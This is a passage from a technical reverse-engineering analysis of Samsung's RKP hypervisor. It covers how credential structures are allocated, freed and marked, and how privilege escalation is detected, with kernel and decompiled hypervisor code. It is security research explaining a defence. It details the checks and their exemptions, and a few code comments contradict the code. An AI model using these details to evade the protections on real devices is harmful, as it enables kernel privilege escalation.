On the kernel side, this is the case when the cred
structure is being freed by the selinux_cred_free
function. It invokes the RKP_KDP_X45
command but also calls rkp_free_security
to free the task_security_struct
structure.
static void selinux_cred_free(struct cred *cred)
{
// ...
if (rkp_ro_page((unsigned long)cred)) {
uh_call(UH_APP_RKP, RKP_KDP_X45, (u64) &cred->security, 7, 0, 0);
}
// ...
rkp_free_security((unsigned long)tsec);
// ...
}
rkp_free_security
first calls chk_invalid_kern_ptr
 to check if the pointer given as an argument is a valid kernel pointer. It then calls rkp_ro_page
and rkp_from_tsec_jar
to ensure it was allocated from the hypervisor-protected cache, before calling kmem_cache_free
(or kfree
if it wasn't).
void rkp_free_security(unsigned long tsec)
{
if(!tsec ||
chk_invalid_kern_ptr(tsec))
return;
if(rkp_ro_page(tsec) &&
rkp_from_tsec_jar(tsec)){
kmem_cache_free(tsec_jar,(void *)tsec);
}
else {
kfree((void *)tsec);
}
}
chk_invalid_kern_ptr
checks if the pointer starts with 0xffffffc.
int chk_invalid_kern_ptr(u64 tsec)
{
return (((u64)tsec >> 36) != (u64)0xFFFFFFC);
}
rkp_ro_page
calls rkp_is_pg_protected
, unless the address to check is init_cred
or init_sec
.
static inline u8 rkp_ro_page(unsigned long addr)
{
if(!rkp_cred_enable)
return (u8)0;
if((addr == ((unsigned long)&init_cred)) ||
(addr == ((unsigned long)&init_sec)))
return (u8)1;
else
return rkp_is_pg_protected(addr);
}
Finally, rkp_from_tsec_jar
 gets the head page of the object, then its slab cache, and returns whether it is the tsec_jar
cache.
int rkp_from_tsec_jar(unsigned long addr)
{
static void *objp;
static struct kmem_cache *s;
static struct page *page;
objp = (void *)addr;
if(!objp)
return 0;
page = virt_to_head_page(objp);
s = page->slab_cache;
if(s && s->name) {
if(!strcmp(s->name,"tsec_jar")) {
return 1;
}
}
return 0;
}
On the hypervisor side, the command is handled by rkp_cmd_cred_set_security
, which calls rkp_cred_set_security
.
rkp_cred_set_security
gets the cred
structure from the pointer to its security
field that was given as an argument. It ensures it is marked as CRED
in the physmap before setting the security
field to a poison value.
int64_t* rkp_cred_set_security(saved_regs_t* regs) {
// ...
// Get the beginning of the cred structure from the pointer to its security field, and convert the VA into a PA.
cred = rkp_get_pa(regs->x2 - 8 * rkp_cred->CRED_SECURITY_OFFSET);
// Ensure the cred structure is marked as `CRED` in the physmap.
  if (!is_phys_map_cred(cred)) {
return uh_log('L', "rkp_kdp.c", 146, "invalidate_security: invalid cred !!!!! %lx %lx %lx", regs->x2,
regs->x2 - 8 * CRED_SECURITY_OFFSET, CRED_SECURITY_OFFSET);
}
// Convert the VA of the security field to a PA.
security = rkp_get_pa(regs->x2);
// Set the security field to the poison value 7 (remember that we are freeing the cred structure).
*security = 7;
return security;
}
Before delving into the credentials change, we must first explain the hypervisor's process marking.
On the kernel side, it happens in the handler of the execve
system call. It will invoke the RKP_KDP_X4B
command, giving it the path of the binary being executed, to detect any violations. In addition, if the current task is root, as checked with the CHECK_ROOT_UID
macro, and the checking of restrictions on the binary being executed by the rkp_restrict_fork
function fails, the system call returns immediately.
SYSCALL_DEFINE3(execve,
const char __user *, filename,
const char __user *const __user *, argv,
const char __user *const __user *, envp)
{
struct filename *path = getname(filename);
int error = PTR_ERR(path);
if(IS_ERR(path))
return error;
if(rkp_cred_enable){
uh_call(UH_APP_RKP, RKP_KDP_X4B, (u64)path->name, 0, 0, 0);
}
if(CHECK_ROOT_UID(current) && rkp_cred_enable) {
if(rkp_restrict_fork(path)){
pr_warn("RKP_KDP Restricted making process. PID = %d(%s) "
"PPID = %d(%s)\n",
current->pid, current->comm,
current->parent->pid, current->parent->comm);
putname(path);
return -EACCES;
}
}
putname(path);
return do_execve(getname(filename), argv, envp);
}
The CHECK_ROOT_UID
 macro returns true if any of the UID, GID, EUID, EGID, SUID, or SGID is zero.
#define CHECK_ROOT_UID(x) (x->cred->uid.val == 0 || x->cred->gid.val == 0 || \
x->cred->euid.val == 0 || x->cred->egid.val == 0 || \
x->cred->suid.val == 0 || x->cred->sgid.val == 0)
The rkp_restrict_fork
function ignores the /system/bin/patchoat
and /system/bin/idmap2
binaries. It also ignores processes marked as "Linux on Dex", as checked by the rkp_is_lod
macro. For processes marked as "non root", checked by the rkp_is_nonroot
macro, the credentials are changed to the shell
user credentials (that is, UID and GID 2000).
static int rkp_restrict_fork(struct filename *path)
{
struct cred *shellcred;
if (!strcmp(path->name, "/system/bin/patchoat") ||
!strcmp(path->name, "/system/bin/idmap2")) {
return 0;
}
/* If the Process is from Linux on Dex,
then no need to reduce privilege */
#ifdef CONFIG_LOD_SEC
if(rkp_is_lod(current)){
return 0;
}
#endif
if(rkp_is_nonroot(current)){
shellcred = prepare_creds();
if (!shellcred) {
return 1;
}
shellcred->uid.val = 2000;
shellcred->gid.val = 2000;
shellcred->euid.val = 2000;
shellcred->egid.val = 2000;
commit_creds(shellcred);
}
return 0;
}
The rkp_is_nonroot
macro checks if bit 1 of the type
field of the cred
structure is set.
#define rkp_is_nonroot(x) ((x->cred->type)>>1 & 1)
The rkp_is_lod
macro checks if bit 3 of the type
field of the cred
structure is set.
#define rkp_is_lod(x) ((x->cred->type)>>3 & 1)
Now we will take a look at the hypervisor side of the process marking to see when these two bits are set.
On the hypervisor side, the command in execve
is handled by rkp_cmd_mark_ppt
, which calls rkp_mark_ppt
.
rkp_mark_ppt
does some sanity checking on the current task_struct
and its cred
structure, and then changes the bits of the type
field:
- it sets CRED_FLAG_MARK_PPT (bit 2) for adbd, app_process32 and app_process64;
- it sets CRED_FLAG_LOD (bit 3) for nst;
- it clears CRED_FLAG_CHILD_PPT (bit 1) for idmap2 and patchoat.
void rkp_mark_ppt(saved_regs_t* regs) {
// ...
// Get the current task_struct in the kernel.
current_va = rkp_ns_get_current();
// Convert the current task_struct VA into a PA.
current_pa = rkp_get_pa(current_va);
// Get the current cred structure from the current task_struct.
current_cred = rkp_get_pa(*(current_pa + 8 * rkp_cred->TASK_CRED_OFFSET));
// Get the binary path given as argument in register x2.
name_va = regs->x2;
// Convert the binary path VA into a PA.
name_pa = rkp_get_pa(name_va);
// Sanity-check: the values must be non NULL and the current cred must be marked as `CRED` in the physmap.
if (!current_cred || !name_pa || rkp_phys_map_verify_cred(current_cred)) {
uh_log('L', "rkp_kdp.c", 551, "rkp_mark_ppt NULL Cred OR filename %lx %lx %lx", current_cred, 0, 0);
}
// adbd, app_process32 and app_process64 are marked as `CRED_FLAG_MARK_PPT` (4).
if (!strcmp(name_pa, "/system/bin/adbd") || !strcmp(name_pa, "/system/bin/app_process32") ||
!strcmp(name_pa, "/system/bin/app_process64")) {
*(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_MARK_PPT;
}
// nst is marked as `CRED_FLAG_LOD` (8, checked by `rkp_is_lod`).
if (!strcmp(name_pa, "/system/bin/nst")) {
*(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_LOD;
}
// idmap2 is unmarked as `CRED_FLAG_CHILD_PPT` (2, checked by `rkp_is_nonroot`).
if (!strcmp(name_pa, "/system/bin/idmap2")) {
*(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_CHILD_PPT;
}
// patchoat is unmarked as `CRED_FLAG_CHILD_PPT` (2, checked by `rkp_is_nonroot`).
if (!strcmp(name_pa, "/system/bin/patchoat")) {
*(current_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_CHILD_PPT;
}
}
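The rkp_ns_get_current helper used above retrieves the kernel's current task_struct. A minimal sketch of the idea, assuming it simply reads back the register in which the arm64 kernel keeps its current pointer (the accessor name is hypothetical):
uint64_t rkp_ns_get_current(void) {
  // The arm64 kernel keeps the current task_struct pointer in SP_EL0 while
  // running at EL1, so the hypervisor can read it back from EL2.
  return get_sp_el0();  /* hypothetical system register accessor */
}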
When the kernel needs to change the credentials of a task, it calls into the hypervisor, which does some extensive checking to detect privilege escalation attempts. Before digging into the hypervisor side, let's see how a cred
structure is assigned to a task_struct
.
cred
structures are allocated from three places. The first one is the copy_creds
function. In addition to a comment stating the credentials are no longer shared among the same thread group, we can see that the return value of the prepare_ro_creds
function is assigned to the cred
field of the task_struct
.
int copy_creds(struct task_struct *p, unsigned long clone_flags)
{
// ...
/*
* Disabling cred sharing among the same thread group. This
* is needed because we only added one back pointer in cred.
*
* This should NOT in any way change kernel logic, if we think about what
* happens when a thread needs to change its credentials: it will just
* create a new one, while all other threads in the same thread group still
* reference the old one, whose reference counter decreases by 2.
*/
// ...
if(rkp_cred_enable){
p->cred = p->real_cred = prepare_ro_creds(new, RKP_CMD_COPY_CREDS, (u64)p);
put_cred(new);
}
// ...
}
The second place is the commit_creds
function. It ensures that the new credentials are protected by the hypervisor by calling rkp_ro_page
, before also assigning to the cred
of the current task_struct
the return value of the prepare_ro_creds
function.
int commit_creds(struct cred *new)
{
if (rkp_ro_page((unsigned long)new))
BUG_ON((rocred_uc_read(new)) < 1);
else
// ...
if(rkp_cred_enable) {
struct cred *new_ro;
new_ro = prepare_ro_creds(new, RKP_CMD_CMMIT_CREDS, 0);
rcu_assign_pointer(task->real_cred, new_ro);
rcu_assign_pointer(task->cred, new_ro);
}
else {
// ...
}
// ...
if (rkp_cred_enable){
put_cred(new);
put_cred(new);
}
// ...
}
The third place is the override_creds
function. Yet again, we can see another call to prepare_ro_creds
before assigning the return value to the cred
field of the current task_struct
.
#define override_creds(x) rkp_override_creds(&x)
const struct cred *rkp_override_creds(struct cred **cnew)
{
// ...
struct cred *new = *cnew;
// ...
if(rkp_cred_enable) {
volatile unsigned int rkp_use_count = rkp_get_usecount(new);
struct cred *new_ro;
new_ro = prepare_ro_creds(new, RKP_CMD_OVRD_CREDS, rkp_use_count);
*cnew = new_ro;
rcu_assign_pointer(current->cred, new_ro);
put_cred(new);
}
else {
// ...
}
// ...
}
prepare_ro_creds
allocates a new read-only cred
structure from the cred_jar_ro
cache. We have seen in the Credentials Protection section that new fields have been added to this structure. In particular, the use_cnt
field, the reference count for the cred
structure, needs to be modified often. To work around that, a pointer to a read-write structure containing the reference count is stored in the read-only cred
structure. prepare_ro_creds
thus also allocates a new read-write reference count. It then allocates a new read-only task_security_struct
from the tsec_jar
.
It uses the rkp_cred_fill_params
macro and invokes the RKP_KDP_X46
command to let the hypervisor perform its verifications and copy the data from the read-write version of the cred
structure (the argument) to the read-only one (the newly allocated one). It finally does some sanity-checking, depending on where prepare_ro_creds
was called, before returning the read-only version of the cred
structure.
static struct cred *prepare_ro_creds(struct cred *old, int kdp_cmd, u64 p)
{
u64 pgd =(u64)(current->mm?current->mm->pgd:swapper_pg_dir);
struct cred *new_ro;
void *use_cnt_ptr = NULL;
void *rcu_ptr = NULL;
void *tsec = NULL;
cred_param_t cred_param;
new_ro = kmem_cache_alloc(cred_jar_ro, GFP_KERNEL);
if (!new_ro)
panic("[%d] : kmem_cache_alloc() failed", kdp_cmd);
use_cnt_ptr = kmem_cache_alloc(usecnt_jar,GFP_KERNEL);
if (!use_cnt_ptr)
panic("[%d] : Unable to allocate usage pointer\n", kdp_cmd);
rcu_ptr = get_usecnt_rcu(use_cnt_ptr);
((struct ro_rcu_head*)rcu_ptr)->bp_cred = (void *)new_ro;
tsec = kmem_cache_alloc(tsec_jar, GFP_KERNEL);
if (!tsec)
panic("[%d] : Unable to allocate security pointer\n", kdp_cmd);
rkp_cred_fill_params(old,new_ro,use_cnt_ptr,tsec,kdp_cmd,p);
uh_call(UH_APP_RKP, RKP_KDP_X46, (u64)&cred_param, 0, 0, 0);
if (kdp_cmd == RKP_CMD_COPY_CREDS) {
if ((new_ro->bp_task != (void *)p)
|| new_ro->security != tsec
|| new_ro->use_cnt != use_cnt_ptr) {
panic("[%d]: RKP Call failed task=#%p:%p#, sec=#%p:%p#, usecnt=#%p:%p#", kdp_cmd, new_ro->bp_task,(void *)p,new_ro->security,tsec,new_ro->use_cnt,use_cnt_ptr);
}
}
else {
if ((new_ro->bp_task != current)||
(current->mm
&& new_ro->bp_pgd != (void *)pgd) ||
(new_ro->security != tsec) ||
(new_ro->use_cnt != use_cnt_ptr)) {
panic("[%d]: RKP Call failed task=#%p:%p#, sec=#%p:%p#, usecnt=#%p:%p#, pgd=#%p:%p#", kdp_cmd, new_ro->bp_task,current,new_ro->security,tsec,new_ro->use_cnt,use_cnt_ptr,new_ro->bp_pgd,(void *)pgd);
}
}
rocred_uc_set(new_ro, 2);
set_cred_subscribers(new_ro, 0);
get_group_info(new_ro->group_info);
get_uid(new_ro->user);
get_user_ns(new_ro->user_ns);
#ifdef CONFIG_KEYS
key_get(new_ro->session_keyring);
key_get(new_ro->process_keyring);
key_get(new_ro->thread_keyring);
key_get(new_ro->request_key_auth);
#endif
validate_creds(new_ro);
return new_ro;
}
The rkp_cred_fill_params
macro simply fills the fields of the cred_param_t
structure given as an argument to the RKP command.
typedef struct cred_param{
struct cred *cred;
struct cred *cred_ro;
void *use_cnt_ptr;
void *sec_ptr;
unsigned long type;
union {
void *task_ptr;
u64 use_cnt;
};
}cred_param_t;
#define rkp_cred_fill_params(crd,crd_ro,uptr,tsec,rkp_cmd_type,rkp_use_cnt) \
do { \
cred_param.cred = crd; \
cred_param.cred_ro = crd_ro; \
cred_param.use_cnt_ptr = uptr; \
cred_param.sec_ptr= tsec; \
cred_param.type = rkp_cmd_type; \
cred_param.use_cnt = (u64)rkp_use_cnt; \
} while(0)
On the hypervisor side, the command is handled by the rkp_cmd_assign_creds
function, which calls rkp_assign_creds
.
rkp_assign_creds
does a lot of checks that can be summarized as follows (where "current" refers to the cred
of the current
task, "old" refers to the read-write cred
, and "new" refers to the read-only cred
structure):
- the new cred structure must be protected by the hypervisor;
- rkp_check_pe and from_zyg_adbd are called to detect privilege escalation, unless the current task is marked CRED_FLAG_LOD;
- check_privilege_escalation is called for each UID, EUID, GID, and EGID pair of the old and current tasks to detect privilege escalation;
- the old cred is copied into the new cred structure, and its use_cnt field is set;
- for non copy_creds callers, the back-pointers of the new cred structure are set from the current task;
- for the override_creds caller, the new cred structure is unmarked CRED_FLAG_ORPHAN if the usage count given as argument is less than or equal to 1, or it is marked otherwise;
- for the copy_creds caller, the back-pointer is set from the task being copied;
- the new task_security_struct must be protected by the hypervisor;
- the old task_security_struct is copied into the new task_security_struct, and the back-pointers are set accordingly;
- if the current task is marked CRED_FLAG_MARK_PPT, the new task is marked CRED_FLAG_MARK_PPT.
void rkp_assign_creds(saved_regs_t* regs) {
// ...
// Convert the VA of the argument structure to a PA.
cred_param = rkp_get_pa(regs->x2);
if (!cred_param) {
uh_log('L', "rkp_kdp.c", 662, "NULL pData");
return;
}
// Get the current task_struct in the kernel.
curr_task_va = rkp_ns_get_current();
// Convert the current task_struct VA into a PA.
curr_task = rkp_get_pa(curr_task_va);
// Get the current cred structure from the current task_struct.
curr_cred_va = *(curr_task + 8 * rkp_cred->TASK_CRED_OFFSET);
// Convert the current cred structure VA into a PA.
curr_cred = rkp_get_pa(curr_cred_va);
// Get the target RW cred from the argument structure and convert it from a VA to a PA.
targ_cred = rkp_get_pa(cred_param->cred);
// Get the target RO cred from the argument structure and convert it from a VA to a PA.
targ_cred_ro = rkp_get_pa(cred_param->cred_ro);
// Get the current task_security_struct from the current cred structure.
curr_secptr_va = *(curr_cred + 8 * rkp_cred->CRED_SECURITY_OFFSET);
// Convert the current task_security_struct from a VA to a PA.
curr_secptr = rkp_get_pa(curr_secptr_va);
// Sanity-check: the current cred structure must be non NULL.
if (!curr_cred) {
uh_log('L', "rkp_kdp.c", 489, "\nCurrent Cred is NULL %lx %lx %lx\n ", curr_task, curr_task_va, 0);
return rkp_policy_violation("Data Protection Violation %lx %lx %lx", curr_task_va, curr_task, 0);
}
// Sanity-check: the current task_security_struct must be non NULL, or RKP must not be deferred initialized.
if (!curr_secptr && rkp_deferred_inited) {
uh_log('L', "rkp_kdp.c", 495, "\nCurrent sec_ptr is NULL %lx %lx %lx\n ", curr_task, curr_task_va, curr_cred);
return rkp_policy_violation("Data Protection Violation %lx %lx %lx", curr_task_va, curr_cred, 0);
}
// Get the back-pointer (a cred structure pointer) of the current task_security_struct.
bp_cred_va = *(curr_secptr + 8 * rkp_cred->SEC_BP_CRED_OFFSET);
// Get the back-pointer (a task_struct pointer) of the current cred structure.
bp_task_va = *(curr_cred + 8 * rkp_cred->CRED_BP_TASK_OFFSET);
// Sanity-check: the back-pointers must point to the current cred structure and current task_struct respectively.
if (bp_cred_va != curr_cred_va || bp_task_va != curr_task_va) {
uh_log('L', "rkp_kdp.c", 502, "\n Integrity Check failed_1 %lx %lx %lx\n ", bp_cred_va, curr_cred_va, curr_cred);
uh_log('L', "rkp_kdp.c", 503, "\n Integrity Check failed_2 %lx %lx %lx\n ", bp_task_va, curr_task_va, curr_task);
rkp_policy_violation("KDP Privilege Escalation %lx %lx %lx", bp_cred_va, curr_cred_va, curr_secptr);
return;
}
// Sanity-check: the target RW and RO cred structures must be non NULL and the target RO cred structure must be marked
// as `CRED` in the physmap.
if (!targ_cred || !targ_cred_ro || rkp_phys_map_verify_cred(targ_cred_ro)) {
uh_log('L', "rkp_kdp.c", 699, "rkp_assign_creds !! %lx %lx", targ_cred_ro, targ_cred);
return;
}
skip_checks = 0;
// Get the type field (used to process marking) from the current cred structure.
curr_flags = *(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
// If the current task is not a "Linux on Dex" process.
if ((curr_flags & CRED_FLAG_LOD) == 0) {
// Get the uid, euid, gid, egid fields from the current cred structure.
curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
curr_euid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
// If none of those fields have the LOD prefix (0x61a8).
if ((curr_uid & 0xffff0000) != 0x61a80000 && (curr_euid & 0xffff0000) != 0x61a80000 &&
(curr_gid & 0xffff0000) != 0x61a80000 && (curr_egid & 0xffff0000) != 0x61a80000) {
// And if the device is locked.
if (!rkp_cred->VERIFIED_BOOT_STATE) {
// Call `rkp_check_pe` and `from_zyg_adbd` to detect instances of privilege escalation.
if (rkp_check_pe(targ_cred, curr_cred) && from_zyg_adbd(curr_task, curr_cred)) {
uh_log('L', "rkp_kdp.c", 717, "Priv Escalation! %lx %lx %lx", targ_cred,
*(targ_cred + 8 * rkp_cred->CRED_EUID_OFFSET), *(curr_cred + 8 * rkp_cred->CRED_EUID_OFFSET));
// If either of these 2 functions returned true, call `rkp_privilege_escalation` to handle it.
        return rkp_privilege_escalation(targ_cred, curr_cred, 1);
}
}
// If the device is locked, or no privilege escalation was detected, skip the next checks.
skip_checks = 1;
}
// If the current task has a LOD prefixed field, mark it as `CRED_FLAG_LOD`.
else {
*(curr_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET) = curr_flags | CRED_FLAG_LOD;
}
}
// If the checks are not skipped.
if (!skip_checks) {
// Get the uid field of the target RW cred structure.
targ_uid = *(targ_cred + rkp_cred->CRED_UID_OFFSET);
priv_esc = 0;
// If the uid is not INET (3003).
if (targ_uid != 3003) {
// Get the uid field of the current cred structure.
      curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
priv_esc = 0;
// Call `check_privilege_escalation` to detect privilege escalation.
if (check_privilege_escalation(targ_uid, curr_uid)) {
uh_log('L', "rkp_kdp.c", 382, "\n LOD: uid privilege escalation curr_uid = %ld targ_uid = %ld \n", curr_uid,
targ_uid);
// If the function returns true, privilege escalation was detected.
priv_esc = 1;
}
}
// Get the euid field of the target RW cred structure.
targ_euid = *(targ_cred + rkp_cred->CRED_EUID_OFFSET);
// If the euid is not INET (3003).
if (targ_euid != 3003) {
// Get the euid field of the current cred structure.
      curr_euid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
// Call `check_privilege_escalation` to detect privilege escalation.
if (check_privilege_escalation(targ_euid, curr_euid)) {
uh_log('L', "rkp_kdp.c", 387, "\n LOD: euid privilege escalation curr_euid = %ld targ_euid = %ld \n", curr_euid,
targ_euid);
// If the function returns true, privilege escalation was detected.
priv_esc = 1;
}
}
// Get the gid field of the target RW cred structure.
targ_gid = *(targ_cred + rkp_cred->CRED_GID_OFFSET);
// If the gid is not INET (3003).
if (targ_gid != 3003) {
// Get the gid field of the current cred structure.
      curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
// Call `check_privilege_escalation` to detect privilege escalation.
if (check_privilege_escalation(targ_gid, curr_gid)) {
uh_log('L', "rkp_kdp.c", 392, "\n LOD: Gid privilege escalation curr_gid = %ld targ_gid = %ld \n", curr_gid,
targ_gid);
// If the function returns true, privilege escalation was detected.
priv_esc = 1;
}
}
// Get the egid field of the target RW cred structure.
targ_egid = *(targ_cred + rkp_cred->CRED_EGID_OFFSET);
// If the egid is not INET (3003).
if (targ_egid != 3003) {
// Get the egid field of the current cred structure.
      curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
// Call `check_privilege_escalation` to detect privilege escalation.
if (check_privilege_escalation(targ_egid, curr_egid)) {
uh_log('L', "rkp_kdp.c", 397, "\n LOD: egid privilege escalation curr_egid = %ld targ_egid = %ld \n", curr_egid,
targ_egid);
// If the function returns true, privilege escalation was detected.
priv_esc = 1;
}
}
// If privilege escalation was detected on the UID, EUID, GID or EGID.
if (priv_esc) {
uh_log('L', "rkp_kdp.c", 705, "Linux on Dex Priv Escalation! %lx ", targ_cred);
if (curr_task) {
curr_comm = curr_task + 8 * rkp_cred->TASK_COMM_OFFSET;
uh_log('L', "rkp_kdp.c", 707, curr_comm);
}
// Call `rkp_privilege_escalation` to handle it.
      return rkp_privilege_escalation(targ_cred, curr_cred, 1);
}
}
// The checks passed, copy the RW cred into the RO cred structure.
memcpy(targ_cred_ro, targ_cred, rkp_cred->CRED_SIZE);
cmd_type = cred_param->type;
// Set the use_cnt field of the RO cred structure.
*(targ_cred_ro + 8 * rkp_cred->CRED_USE_CNT) = cred_param->use_cnt_ptr;
// If the caller of `prepare_ro_creds` was not `copy_creds`.
if (cmd_type != RKP_CMD_COPY_CREDS) {
    // Get the current mm_struct from the current task_struct.
    curr_mm_va = *(curr_task + 8 * rkp_cred->TASK_MM_OFFSET);
// If the current mm_struct is not NULL.
if (curr_mm_va) {
curr_mm = rkp_get_pa(curr_mm_va);
// Extract the current PGD from it.
curr_pgd_va = *(curr_mm + 8 * rkp_cred->MM_PGD_OFFSET);
} else {
// Otherwise, get it from TTBR1_EL1.
curr_pgd_va = rkp_get_va(get_ttbr1_el1() & 0xffffffffc000);
}
// Set the bp_pgd and bp_task fields of the RO cred structure.
*(targ_cred_ro + 8 * rkp_cred->CRED_BP_PGD_OFFSET) = curr_pgd_va;
*(targ_cred_ro + 8 * rkp_cred->CRED_BP_TASK_OFFSET) = curr_task_va;
// If the caller of `prepare_ro_creds` is `override_creds`.
if (cmd_type == RKP_CMD_OVRD_CREDS) {
// If the argument structure usage counter is lower or equal to 1, unmark the target RO cred as
// `CRED_FLAG_ORPHAN`.
if (cred_param->use_cnt <= 1) {
*(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) &= ~CRED_FLAG_ORPHAN;
}
// Otherwise, mark the target RO cred as `CRED_FLAG_ORPHAN`.
else {
*(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_ORPHAN;
}
}
}
// If the caller of `prepare_ro_creds` is `copy_creds`, set the bp_task field of the RO cred structure to the current
// task_struct.
else {
*(targ_cred_ro + 8 * rkp_cred->CRED_BP_TASK_OFFSET) = cred_param->task_ptr;
}
// Get the new task_security_struct from the argument structure.
newsec_ptr_va = cred_param->sec_ptr;
// Get the target RO cred structure from the argument structure.
targ_cred_ro_va = cred_param->cred_ro;
// If the new task_security_struct is not NULL.
if (newsec_ptr_va) {
// Convert the new task_security_struct from a VA to a PA.
newsec_ptr = rkp_get_pa(newsec_ptr_va);
// Get the old task_security_struct from the target RW cred structure.
oldsec_ptr_va = *(targ_cred + 8 * rkp_cred->CRED_SECURITY_OFFSET);
// Convert the old task_security_struct from a VA to a PA.
oldsec_ptr = rkp_get_pa(oldsec_ptr_va);
// Call `chk_invalid_sec_ptr` to check if the new task_security_struct is hypervisor-protected, and ensure both the
// old and the new task_security_struct are non NULL.
if (chk_invalid_sec_ptr(newsec_ptr) || !oldsec_ptr || !newsec_ptr) {
uh_log('L', "rkp_kdp.c", 594, "Invalid sec pointer [assign_secptr] %lx %lx %lx", newsec_ptr_va, newsec_ptr,
oldsec_ptr);
// If any of these checks fails, trigger a policy violation.
rkp_policy_violation("Data Protection Violation %lx %lx %lx", newsec_ptr_va, oldsec_ptr, newsec_ptr);
}
// If the old and new task_security_struct are valid.
else {
// Get the new sid from the new task_security_struct.
new_sid = *(newsec_ptr + 4);
// Get the old sid from the old task_security_struct.
old_sid = *(oldsec_ptr + 4);
// If RKP is deferred initialized and the SID jumps from below to above `sysctl_net` (20).
if (rkp_deferred_inited && old_sid < 20 && new_sid > 20) {
uh_log('L', "rkp_kdp.c", 607, "Selinux Priv Escalation !! [assign_secptr] %lx %lx ", old_sid, new_sid);
// Trigger a policy violation.
rkp_policy_violation("Data Protection Violation %lx %lx %lx", old_sid, new_sid, 0);
} else {
// Copy the old task_security_struct to the new one.
memcpy(newsec_ptr, oldsec_ptr, rkp_cred->SP_SIZE);
// Set the security field of the target RO cred structure to the new task_security_struct.
*(targ_cred_ro + 8 * rkp_cred->CRED_SECURITY_OFFSET) = newsec_ptr_va;
// Set the bp_cred field of the new task_security_struct to the target RO cred structure.
*(newsec_ptr + 8 * rkp_cred->SEC_BP_CRED_OFFSET) = targ_cred_ro_va;
}
}
}
// If the new task_security_struct is NULL, trigger a policy violation.
else {
uh_log('L', "rkp_kdp.c", 583, "Security Pointer is NULL [assign_secptr] %lx", 0);
rkp_policy_violation("Data Protection Violation", 0, 0, 0);
}
// If the device is unlocked, return immediately.
if (rkp_cred->VERIFIED_BOOT_STATE) {
return;
}
// Get the type field from the RO cred structure.
targ_flags = *(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET);
// If the target task is not marked as `CRED_FLAG_MARK_PPT`.
if ((targ_flags & CRED_FLAG_MARK_PPT) != 0) {
// Get the parent task_struct of the current task_struct.
parent_task_va = *(curr_task + 8 * rkp_cred->TASK_PARENT_OFFSET);
// Convert the parent task_struct from a VA to a PA.
parent_task = rkp_get_pa(parent_task_va);
// Get the parent cred structure from the parent task_struct.
parent_cred_va = *(parent_task + 8 * rkp_cred->TASK_CRED_OFFSET);
// Convert the parent cred structure from a VA to a PA.
parent_cred = rkp_get_pa(parent_cred_va);
// Get the type field from the parent cred structure.
parent_flags = *(parent_cred + 8 * rkp_cred->CRED_FLAGS_OFFSET);
// If the parent task is marked as `CRED_FLAG_MARK_PPT`.
if ((parent_flags & CRED_FLAG_MARK_PPT) != 0) {
// Mark the current task's new cred as `CRED_FLAG_CHILD_PPT` too.
*(targ_cred_ro + 8 * rkp_cred->CRED_FLAGS_OFFSET) |= CRED_FLAG_CHILD_PPT;
}
}
}
Let's now go over the different functions that are called by rkp_assign_creds. In particular, the functions that try to detect privilege escalation are really interesting from a security standpoint.
The rkp_ns_get_current function returns the current task of the kernel (stored in SP_EL0 or SP_EL1).
uint64_t rkp_ns_get_current() {
// SPSel, Stack Pointer Select.
//
// SP, bit [0]: Stack pointer to use.
if (get_sp_sel()) {
return get_sp_el0();
} else {
return get_sp_el1();
}
}
The rkp_check_pe function is called for non "Linux on Dex" processes when the device is locked. For each UID, GID, EUID, and EGID pair of the target RW cred and current cred structures, it calls the check_pe_id function to decide if this is an instance of privilege escalation. For effective IDs, the target one must also be lower than the current one. Otherwise, it is not considered privilege escalation.
bool rkp_check_pe(int64_t targ_cred, int64_t curr_cred) {
// ...
// Get the uid field of the current cred structure.
curr_uid = *(curr_cred + 4 * rkp_cred->CRED_UID_OFFSET);
// Get the uid field of the target RW cred structure.
targ_uid = *(targ_cred + 4 * rkp_cred->CRED_UID_OFFSET);
// Call `check_pe_id` to detect privilege escalation.
if (check_pe_id(targ_uid, curr_uid)) {
return 1;
}
// Get the gid field of the current cred structure.
curr_gid = *(curr_cred + 4 * rkp_cred->CRED_GID_OFFSET);
// Get the gid field of the target RW cred structure.
targ_gid = *(targ_cred + 4 * rkp_cred->CRED_GID_OFFSET);
// Call `check_pe_id` to detect privilege escalation.
if (check_pe_id(targ_gid, curr_gid)) {
return 1;
}
// Get the euid field of the current cred structure.
curr_euid = *(curr_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
// Get the euid field of the target RW cred structure.
targ_euid = *(targ_cred + 4 * rkp_cred->CRED_EUID_OFFSET);
// If the target euid is lower than the current one and `check_pe_id` returns true, this is privilege escalation.
if (targ_euid < curr_uid && check_pe_id(targ_euid, curr_euid)) {
return 1;
}
// Get the egid field of the current cred structure.
curr_egid = *(curr_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
// Get the egid field of the target RW cred structure.
targ_egid = *(targ_cred + 4 * rkp_cred->CRED_EGID_OFFSET);
// If the target egid is lower than the current one and `check_pe_id` returns true, this is privilege escalation.
if (targ_egid < curr_gid && check_pe_id(targ_egid, curr_egid)) {
return 1;
}
return 0;
}
check_pe_id returns true if the current ID is greater than 1000 and the target ID is lower than or equal to 1000 (SYSTEM).
int64_t check_pe_id(uint32_t targ_id, uint32_t curr_id) {
// PE is detected if the current ID is bigger and the target ID is smaller or equal to `SYSTEM` (1000).
return curr_id > 1000 && targ_id <= 1000;
}
